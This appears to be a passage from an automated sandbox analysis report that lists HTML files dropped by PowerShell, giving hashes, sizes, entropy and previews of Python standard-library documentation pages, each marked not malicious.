                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1551), with CRLF line terminators
                              Category:dropped
                              Size (bytes):112925
                              Entropy (8bit):4.860173354990031
                              Encrypted:false
                              SSDEEP:1536:qqqy+tcM5YbJ2k+3yFdyF8ySpyTcyY4yF0A3wGoA3yFdyF8ySpyYoMvKOcgg1vX6:Q0gAvMvBc+Oewdg
                              MD5:228C5C9D82D574C305556CA3D37C74D5
                              SHA1:87B5F681B462DC18C4D6B077EDBB6CC011C54053
                              SHA-256:8F2A6DE50279010B2CE70EAA3DE0848FD4D8EEB68EE9A7D3F350F1D328ABC871
                              SHA-512:0C506A52BAB8D7F140F7236DF1D4CB5B0703D9455DE76E538CCE1DFECED1FA89B8976850ABA1A646429D931C7BB249E835FBE239C7EA56C12F7368CB628E57F3
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="tkinter . Python interface to Tcl/Tk" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/tkinter.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/tkinter/__init__.py The tkinter package (.Tk interface.) is the standard Python interface to the Tcl/Tk GUI toolkit. Both Tk and tkinter are available on most Unix platforms, inclu..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/tkinter/__init__.py T
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1130), with CRLF line terminators
                              Category:dropped
                              Size (bytes):43670
                              Entropy (8bit):4.873567438938664
                              Encrypted:false
                              SSDEEP:768:Lqy2sMMYs86yFoaGojasUGAyFMyFoa0mEAyFMyFoa06AyFMyFoaWSeAyFMyFwjyO:LqyWMYs86yFoavjasUGAyFMyFoa0mEAa
                              MD5:DF1DFBF38755F0F12D7F3834DC962641
                              SHA1:30E4E8A8A14B7C5E79716395EE7606CFFC89FD87
                              SHA-256:1A374C6649668E231B78DABE07F7A62E6FDEF9C64217E5DDD5917B693028CDEE
                              SHA-512:5C751D38599DC35B438651CCFA913BABD70CE1E49B7D6584AB3F40E2567613170B049DEB9ABFFCBAAF45E103C2B71F1F211336E6C929CC1270A2565C8691DC14
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="tkinter.messagebox . Tkinter message prompts" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/tkinter.messagebox.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/tkinter/messagebox.py The tkinter.messagebox module provides a template base class as well as a variety of convenience methods for commonly used configurations. The message boxes a..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/tkinte
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (742), with CRLF line terminators
                              Category:dropped
                              Size (bytes):17756
                              Entropy (8bit):4.850702271496922
                              Encrypted:false
                              SSDEEP:384:HvGvzHqklljbnFTMFb29ohDek6yFogiDCO9nJTMK76dqEC:POTqylnBMFC9Qek6yFogiDCI9MK764N
                              MD5:8EF2797819E4D3C1BCDAB51BA8FD9CF2
                              SHA1:72A6676F5DE0437E2933B8F62264DB38A92F8ACA
                              SHA-256:00FA8915E863F673DAE874747B0EFEC5B8CB5661F270487FF068221C7ACBFE34
                              SHA-512:D9E22FE921D881574E6E555C20CC0BA9DD59FD63F8B41CD248EE18B49A5D7605A83CC4256F29B0431AA3914FE2C7D3047D90DC7BFEFCFD02F5AA57BF20223389
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="tkinter.scrolledtext . Scrolled Text Widget" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/tkinter.scrolledtext.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/tkinter/scrolledtext.py The tkinter.scrolledtext module provides a class of the same name which implements a basic text widget which has a vertical scroll bar configured to do the ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/tkint
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (977), with CRLF line terminators
                              Category:dropped
                              Size (bytes):64260
                              Entropy (8bit):4.869768673106328
                              Encrypted:false
                              SSDEEP:1536:tqy8MMvx+3yFdyF8yETarwBK/odK4t0YlWEZ9+x7RNyIWUqIdfivIIXZKLb/9/8a:8Dpg
                              MD5:D4524D64D2E41265A84E9F1A804E6E66
                              SHA1:F3F5D83504CD0A5242EC9851F92D60D44FF701C6
                              SHA-256:52885871EE78F81BE382C5EE18F3DA2E73E117098F47808B280D739CC45463E7
                              SHA-512:862522C5602298F83737A3A0D5AF642373B5D839E02A1A81C014359E4E978B7B6E5033F6FECC5A4921C11CBCE47EF1807E17BAED1DC030E2283B88925E685561
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="tkinter.tix . Extension widgets for Tk" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/tkinter.tix.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/tkinter/tix.py The tkinter.tix(Tk Interface Extension) module provides an additional rich set of widgets. Although the standard Tk library has many useful widgets, they are far fro..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/tkinter/tix.py The
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (775), with CRLF line terminators
                              Category:dropped
                              Size (bytes):146149
                              Entropy (8bit):4.870375777282373
                              Encrypted:false
                              SSDEEP:1536:trqy13QMDi14bvAAcGAdNOvPOkcIYyFwHog0IyFgfIpGyFuPPdqjBP0UF2RkogZ/:5VAV1rW1ahFg6EHGvwog
                              MD5:57589B50E8B95BF827DB143B7A9D851D
                              SHA1:238F6C8BC700C3E8CFD157CC502307988F206469
                              SHA-256:3EE633EA407078E5596CC046D032900735F2529E4976E7FCC5F60A7D7D2B4968
                              SHA-512:066A7CF79D412773F27E800FA42BF7611E1F8818A95C730A332501FEC7D0B80CD962DE0FB046DB8126900D71695EE22CEF4F715048F4A40964D84E86472A9EA8
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="tkinter.ttk . Tk themed widgets" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/tkinter.ttk.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/tkinter/ttk.py The tkinter.ttk module provides access to the Tk themed widget set, introduced in Tk 8.5. It provides additional benefits including anti-aliased font rendering under..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/tkinter/ttk.py The tkinter
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (647), with CRLF line terminators
                              Category:dropped
                              Size (bytes):51722
                              Entropy (8bit):5.009070664100479
                              Encrypted:false
                              SSDEEP:1536:Lqy2MGkQrznOHIO5dOyg6cOiEujvy5+xzwHmTlyP1ExsS9O3Y/xSruKC8zmcuDhz:t1Bg
                              MD5:4C5BE106ED1C50A0AF9497EFCF89E6D3
                              SHA1:A3DB8601448F8D9E4CCCD6375288B4730EE602E0
                              SHA-256:15973931EF75BF5C57F006EFDEF662D85B944B72DC85CF53115568C2592F8E99
                              SHA-512:3CF8C0E98CCB95D0FB7C018327063EE8FE11D4FAEB5CBB3F2B31D9EA9A910460FE8237004772AE6C8CBCDC1DF49264F00423DBB7EAB3667C2E3627EFEE3D1B8A
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="token . Constants used with Python parse trees" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/token.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/token.py This module provides constants which represent the numeric values of leaf nodes of the parse tree (terminal tokens). Refer to the file Grammar/Tokens in the Python distrib..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/token.py This mod
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (476), with CRLF line terminators
                              Category:dropped
                              Size (bytes):44415
                              Entropy (8bit):4.930702398298753
                              Encrypted:false
                              SSDEEP:768:RiqyvpyyUMPHRdGCRSumKtELJuZBCSJL00yu4VLVc6sCrzoNGf7zPbWFPOwp1yii:sqywMPHiCRSumKt8JuZBCSJXyuuLVc6v
                              MD5:F8F0454E5F0353228700F620FE9A1816
                              SHA1:836485175BDDAEA4765CF8DE635B37D4B44E0C30
                              SHA-256:BC369B3476E49FDA5EF4E3BC960EECCB6E9E3328BF742B16D946CA65AB4A8088
                              SHA-512:0EAD63C9CDD590468BEE3D9DD55F79F647B27CD15ED5435FE349A42E6344050B967646F42A20F757855D97D0690F6F2265F945C98A0F6F3F94CE0FEC583A1611
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="tokenize . Tokenizer for Python source" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/tokenize.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/tokenize.py The tokenize module provides a lexical scanner for Python source code, implemented in Python. The scanner in this module returns comments as tokens as well, making it u..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/tokenize.py The tokeni
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (733), with CRLF line terminators
                              Category:dropped
                              Size (bytes):25108
                              Entropy (8bit):4.895810182979896
                              Encrypted:false
                              SSDEEP:768:rm1qyEvobd1MsIS7C/wlylaf+X/wlyld3fbLv19dBMsR764N:rm1qyEAh1MsIS7C/wlyl0+X/wlyld3f9
                              MD5:8C68839876B1808D5202882B513FA554
                              SHA1:4AA7865E6ED7617208D1FA5859035FD1D693B9FD
                              SHA-256:4B13E621328B2FBE7D9C5D8B9219A5312AF2F532908A3809DD7C5C20E27BBB3A
                              SHA-512:B2AA77E21BA9AB0A4AB85D9FC485FC94940912C2FA60F8CD8E1AD26FFB9725C14847C0CC3DB3BA6A56EAEF6FE853A4511DBAB184068CAD06BEC71045B78AC9F0
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="tomllib . Parse TOML files" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/tomllib.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/tomllib This module provides an interface for parsing TOML (Tom.s Obvious Minimal Language, https://toml.io). This module does not support writing TOML. This module defines the fol..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/tomllib This module provides an i
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2139), with CRLF line terminators
                              Category:dropped
                              Size (bytes):42762
                              Entropy (8bit):4.7857211747493835
                              Encrypted:false
                              SSDEEP:768:xXqyjNaROM1NeKU/3id6Dfk5WdU0Rgnfw0ci4E87cyznIbypyQCyQhyL6yLEykpD:5qyDM18KU/3id6Dfk5WdU0Rgnfw0ci4q
                              MD5:06FC989FBE9E8D74931D9C542202C100
                              SHA1:FEA6A2FEE98F8E12BC19B6F38DBF2CF829325752
                              SHA-256:DA4C7684AA335491A37892CFB05D56C1D7848683E8D7882A90CCAAD17B45A50B
                              SHA-512:4B3E8452717B8F34931F8F911C117A67467740DB3B447F5DBFF0172972E58939B061B2A4948AAC69F1301985BD5F651B430E8E654719AAFA7A27A3B7DFCCEE6C
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="trace . Trace or track Python statement execution" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/trace.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/trace.py The trace module allows you to trace program execution, generate annotated statement coverage listings, print caller/callee relationships and list functions executed durin..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/trace.py The t
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1952), with CRLF line terminators
                              Category:dropped
                              Size (bytes):93888
                              Entropy (8bit):4.856392860925196
                              Encrypted:false
                              SSDEEP:1536:xqyVM6wlKkyFlyFEu7qgajhegL4f5xyFlyFiyTVTxyFlyFiyT7P4yFkyFlyFJzKj:1u/xG/lxg
                              MD5:28B3F1A6E9CD5C5B5E5F30581DAE6C5E
                              SHA1:42B06F756CFE836AB0E7725F7C709AD418345D57
                              SHA-256:80A37AD63832764F1DD54E23570B8ABAC552B9F9C875AAE754EDA5CDDE32C9F4
                              SHA-512:1A3794AA0CA50B84732F40D4058A3784A399F94B686C1E96EC629384BEBB538380744712B46F9936BA1595D7F5F6B75D4CA87EF9AA6C8A445BCE0ADADDAFA673
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="traceback . Print or retrieve a stack traceback" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/traceback.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/traceback.py This module provides a standard interface to extract, format and print stack traces of Python programs. It exactly mimics the behavior of the Python interpreter when i..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/traceback.py
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (934), with CRLF line terminators
                              Category:dropped
                              Size (bytes):128600
                              Entropy (8bit):4.742118416357592
                              Encrypted:false
                              SSDEEP:3072:xcsBqPqcjMyPcsZqRF+TwZr7cYdMPKvgZSZ9ZWryBvdTROZ1LOcRcOZayJZyg:Bg
                              MD5:60B4382FBF0F3F6A53DDAE8DFDFDB3FE
                              SHA1:54076E719F774FE66BE931F5650F9945BC07223C
                              SHA-256:1EE89EF0ECD46E9B79BC5089B0A4A08C3CF4DDA186B6E301E606498AC6C3420C
                              SHA-512:42D8913C32CC081A6737FD11473009BF755F99578F0CBBFC359F447CEA31F4BC03C7D0A8CE792DB3C6C55587DEB2A9373B6C62731C718995E9C91B10794CA8CD
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="tracemalloc . Trace memory allocations" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/tracemalloc.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/tracemalloc.py The tracemalloc module is a debug tool to trace memory blocks allocated by Python. It provides the following information: Traceback where an object was allocated, St..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/tracemalloc.py The
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (583), with CRLF line terminators
                              Category:dropped
                              Size (bytes):22489
                              Entropy (8bit):4.876074173328206
                              Encrypted:false
                              SSDEEP:384:mjKHqkl64xnGTMmb2M/SadbU/caATJ29mbyfNN0QfXmbyfMN07qQeg9PnUTMK76g:lqy6csMmSM/SadU/caj9mbyfNN0WXmbd
                              MD5:AA2C1FAF34E4588D3D5E6B2E723C6178
                              SHA1:23CAFC86D5E10E0DF494CD3D446CF5941A41AB0C
                              SHA-256:091BE6E585A20E34E96A02E2A909D325A6CE76F1BB0D6145C2E42C033E32812D
                              SHA-512:5E947FE08CFB89932642E9776A804EF4D4BB37FA217704FE0E2C8E26D21DBA3E756D1DB07106D79D5D0A34F6F7CCA54C82D80E948DC18C7863F1E9E56A190D2A
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="tty . Terminal control functions" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/tty.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/tty.py The tty module defines functions for putting the tty into cbreak and raw modes. Availability: Unix. Because it requires the termios module, it will work only on Unix. The tt..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/tty.py The tty module defines fun
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (570), with CRLF line terminators
                              Category:dropped
                              Size (bytes):309410
                              Entropy (8bit):4.774426556408551
                              Encrypted:false
                              SSDEEP:3072:A0UqaxmxIn9uktmT+psiA0ksGiNn5p5v0dKQTTEaMkPfjG61pe67u2Tjr7hkjJ+S:ALmxIn8irpmTAO6I7bgkpmlqewg
                              MD5:3E45603ECE227F3567FDF5BAE0BB60B8
                              SHA1:DC5AEB7DC10582B9B58F505E5D889A29D7213DD8
                              SHA-256:37B5DACD0CDEF0D7A4130613A577BD4D3E5A801652E683DF91239C1681321BDA
                              SHA-512:663B7B1194E7344565AFC2A9CD226CF72908438BDFF8D1870EEB025817FCE78D4800187C6743CC1CE8F887B59C73AE87798F223CED00EB82998147D54007F592
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="turtle . Turtle graphics" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/turtle.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/turtle.py Introduction: Turtle graphics is an implementation of the popular geometric drawing tools introduced in Logo, developed by Wally Feurzeig, Seymour Papert and Cynthia Solo..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/turtle.py Introduction: Turtle graphic
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1012), with CRLF line terminators
                              Category:dropped
                              Size (bytes):77853
                              Entropy (8bit):4.819163706261204
                              Encrypted:false
                              SSDEEP:1536:+qybMOAmblyk8yFNyFvTblyk8yFfOAkkK/ZBc7hcnaUAaMddv3mGnqj1HDm6ykI2:YcjfRcMbL9UUYvSYySMzfg
                              MD5:9C0681A44C6F2AA1A61B89EFA5B27F82
                              SHA1:0086E9F270D01357B65704F699FEFAABD2745F11
                              SHA-256:BE1819DE5A45F498FE5EA6CAAECAACBB40B32AF6A6923767C8028EF0D7197631
                              SHA-512:07BAD0B0CABA1E448B161DF2F3B4B8534EA8377F649B11D1C7E77E0D3395077CA6488B97C803BB502C9BF4CA034EC6C62D65440120012CC9E6FDE1DFE64934C4
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="types . Dynamic type creation and names for built-in types" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/types.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/types.py This module defines utility functions to assist in dynamic creation of new types. It also defines names for some object types that are used by the standard Python interpre..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/types
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (646), with CRLF line terminators
                              Category:dropped
                              Size (bytes):460664
                              Entropy (8bit):4.746811850979056
                              Encrypted:false
                              SSDEEP:3072:l1vkrCepqfDrJlFLrfuvyp2tslteLouHP/2dcX77SjmI+iUdCALvaF4L4pxrQ6JZ:l1v+Ce+hnPsenUzg
                              MD5:E28EA6F5686D90D7007E3B9687F59BB9
                              SHA1:0213E000257967D89BCFB1027FC4FBAFC681FF07
                              SHA-256:7BB4E9FA31FF965ECBB763E3DBDA1A7E97E350CA555C80CD8C66658EF09EF9BB
                              SHA-512:244CFB6ACB1FB08A840466EE01D4579417E0908F68E77B7461C5C9FC89EE8C81D70E01C542B1260B818CC2F059F30F356D0DC43C143F224445DEBD7ADA87E247
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="typing . Support for type hints" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/typing.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/typing.py This module provides runtime support for type hints. Consider the function below: The function moon_weight takes an argument expected to be an instance of float, as indic..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/typing.py This module provides
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (535), with CRLF line terminators
                              Category:dropped
                              Size (bytes):31275
                              Entropy (8bit):4.9358316957002435
                              Encrypted:false
                              SSDEEP:768:YqyfoLM01bQPc5/IM5/oC5/ig5/D75o85cR5Fm5TN5Hc5C8+aL4ALUX+aBSUfGSi:YqyoM01bQPc5/IM5/oC5/ig5/D75o85S
                              MD5:09E66D83039A5DDCFF731D460F1AA372
                              SHA1:E72FFBDE81235E28D28231E1DD78C66C579A1F55
                              SHA-256:3B03E282ADAF4FFA781EEB0E4A7503E6C71930E38CE2B665CA830751E6EC116C
                              SHA-512:97CE9FAE8310BCB97E6EAE58A40FB9EC9CA17B9D52465296B9E3EE8B9B05E082082CE724DE76A2B917911FB9487E75AD3936BC393B306440984FA845D57F58B4
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="unicodedata . Unicode Database" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/unicodedata.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This module provides access to the Unicode Character Database (UCD) which defines character properties for all Unicode characters. The data contained in this database is compiled from the UCD versi..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This module provides access to the Unicode C
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (547), with CRLF line terminators
                              Category:dropped
                              Size (bytes):327775
                              Entropy (8bit):4.75543329628818
                              Encrypted:false
                              SSDEEP:3072:8te34l4Xd4Vl7IMT0QgwYloT0AIwY1g7c347dq/UeUkCJg:8fG4v7IMIQUAOg7c347d13Jg
                              MD5:8D933C24BE5D7CC0B45B6699E6D293DA
                              SHA1:B5F11B487C4095F182E5BE4AF14E28A2D8DE4889
                              SHA-256:2FCC54480BF791D1CDAFCC9D8C3FA67265F73B76F68706B9245DA8C9DB83AA19
                              SHA-512:47CEB469FE1FB766BDD31EF7E4D36E7FA4796E5674FC5E62992490B725F7FB090E4C493C81016373CAB8412FFEB956F69AB50EBBB40812617275FCC25C578FA6
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="unittest . Unit testing framework" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/unittest.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/unittest/__init__.py(If you are already familiar with the basic concepts of testing, you might want to skip to the list of assert methods.) The unittest unit testing framework was ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/unittest/__init__.py(If you
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (651), with CRLF line terminators
                              Category:dropped
                              Size (bytes):191492
                              Entropy (8bit):4.740754132731753
                              Encrypted:false
                              SSDEEP:3072:BtpIPzyFr2tpdaZiBsftdiFoPzmbaV6r1E0ErTHtpaWPEaZPg:u8g
                              MD5:6C55A696F66C368F44102C061429D1A8
                              SHA1:337BD36663B4B94FE35F177C59BFE0CB4C8FA292
                              SHA-256:26D86169A8E856C886D9F2D223EA2D3EA3D1DC135F6BEF3A1972497C71536BDC
                              SHA-512:6784B728FF7BDDB3806DC16A929BF2779EB533E316C4895811EFD983097DB2FF96E92C6DD977F22DF82F35FEDF11F37EF7F5FACEB79ED8C07BF836E2455A0948
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="unittest.mock . getting started" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/unittest.mock-examples.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Using Mock: Mock Patching Methods: Common uses for Mock objects include: Patching methods, Recording method calls on objects. You might want to replace a method on an object to check that it is cal..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Using Mock: Mock Patching Method
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1904), with CRLF line terminators
                              Category:dropped
                              Size (bytes):398397
                              Entropy (8bit):4.764643435833687
                              Encrypted:false
                              SSDEEP:3072:LjdD3xYwg0hXiSbWLNDvmDFr2dtpAPzqPzquyfPESQJtpIPzWFwXreY7ow02kAOV:L0xjS2pKeaCig
                              MD5:647F2D0D45303E89E03896ACA538B244
                              SHA1:063900D4693B4E11FD54687E27E6473D833EDF5E
                              SHA-256:9810CDEBCD598768AA4379AD322404E53086D74282E017BDD41B339F5CD86E86
